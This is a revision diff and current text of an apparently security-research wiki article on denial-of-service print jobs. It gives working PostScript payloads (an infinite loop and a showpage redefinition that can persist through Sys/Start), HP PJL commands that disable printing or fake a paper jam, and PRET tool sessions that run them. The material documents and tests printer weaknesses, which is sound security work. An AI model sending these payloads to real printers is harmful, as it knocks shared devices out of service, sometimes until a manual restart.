Difference between revisions of "Document processing"
(→Showpage redefinition) |
|||
(3 intermediate revisions by 2 users not shown) | |||
Line 1: | Line 1: | ||
− | Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] | + | Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's [https://en.wikipedia.org/wiki/Raster_image_processor RIP] busy. Examples of this are complex [https://en.wikipedia.org/wiki/HPGL HP-GL] calculations and [[PostScript]] programs. Even minimalist languages like [[PCL]] can be used to upload permanent macros or fonts until the available memory is consumed. [[PJL]] on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed. |
== PostScript == | == PostScript == | ||
Line 12: | Line 12: | ||
</syntaxhighlight> | </syntaxhighlight> | ||
− | This minimalist document keeps a PostScript interpreter busy forever. In an | + | This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the [[transmission channel]], the connection can be closed immediately after the PostScript code has been sent. Another variant of this attack is to write the code into ''Sys/Start'' or similar files which are executed at interpreter startup and even '''survive a reboot''' on devices with a [[File system access|writable disk]]. |
'''How to test for this attack?''' | '''How to test for this attack?''' | ||
Line 39: | Line 39: | ||
/showpage {} def | /showpage {} def | ||
</syntaxhighlight> | </syntaxhighlight> | ||
+ | |||
+ | Again, this code can also be written into ''Sys/Start'', ''startup.ps'' or similar files to cause '''permanent DoS''' on devices with a [[File system access|writable disk]]. | ||
'''How to test for this attack?''' | '''How to test for this attack?''' | ||
Line 59: | Line 61: | ||
=== PJL jobmedia === | === PJL jobmedia === | ||
− | Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet | + | Proprietary PJL commands <ref>''[http://www.icareasc.com/ICareKM/University/TrainingMaterial/The%20German%20Laserweb/general/software-downloads/paperpathtest%20without%20paper.htm The German Laserweb Vers. 4.0: Test without Paper]'', ATS/GCC Team Germany</ref> can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below: |
@PJL SET SERVICEMODE=HPBOISEID | @PJL SET SERVICEMODE=HPBOISEID |
Latest revision as of 17:43, 8 February 2017
Page description languages allowing infinite loops or calculations that require a lot of computing time can be abused to keep the printer's RIP busy. Examples of this are complex HP-GL calculations and PostScript programs. Even minimalist languages like PCL can be used to upload permanent macros or fonts until the available memory is consumed. PJL on HP devices has undocumented features to completely disable further printing functionality. In this article, various practical approaches of malicious print jobs which lead to denial of service are discussed.
Contents
PostScript
Infinite loops
One trivial example of an infinite loop written in PostScript is given below:
%!
{} loop
This minimalist document keeps a PostScript interpreter busy forever. In an evaluation with a pool of 20 test printers, only one had a watchdog mechanism and restarted itself after about 10 minutes. The other devices did not accept print jobs anymore until the test was ultimately interrupted after half an hour. The malicious print job could in most cases manually be canceled from the control panel, while some devices required a manual restart. In contrast to blocking the transmission channel, the connection can be closed immediately after the PostScript code has been sent. Another variant of this attack is to write the code into Sys/Start or similar files which are executed at interpreter startup and even survive a reboot on devices with a writable disk.
How to test for this attack?
Use PRET's hang command in ps mode:
./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hang Warning: This command causes an infinite loop rendering the device useless until manual restart. Press CTRL+C to abort. Executing PostScript infinite loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
Redefine showpage
Another approach is to permanently redefine PostScript operators as described in security features. By setting showpage – which is used in every document to actually print the page – to do nothing at all, PostScript jobs are processed but not put to paper anymore. Example code is given below:
true 0 startjob
/showpage {} def
Again, this code can also be written into Sys/Start, startup.ps or similar files to cause permanent DoS on devices with a writable disk.
How to test for this attack?
Use PRET's disable command in ps mode:
./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Disabling printing functionality
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
PJL
PJL jobmedia
Proprietary PJL commands [1] can be used to set the older HP devices like the LaserJet 4k series into service mode and completely disable all printing functionality as shown below:
@PJL SET SERVICEMODE=HPBOISEID @PJL DEFAULT JOBMEDIA=OFF
How to test for this attack?
Use PRET's disable command in pjl mode:
./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> disable Printing functionality: OFF
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
Offline mode
In addition, the PJL standard defines the OPMSG command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:
@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"
The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the online button on the control panel.
How to test for this attack?
Use PRET's offline command in pjl mode:
./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> offline "MESSAGE TO DSIPLAY" Warning: Taking the printer offline will prevent yourself and others from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
- ↑ The German Laserweb Vers. 4.0: Test without Paper, ATS/GCC Team Germany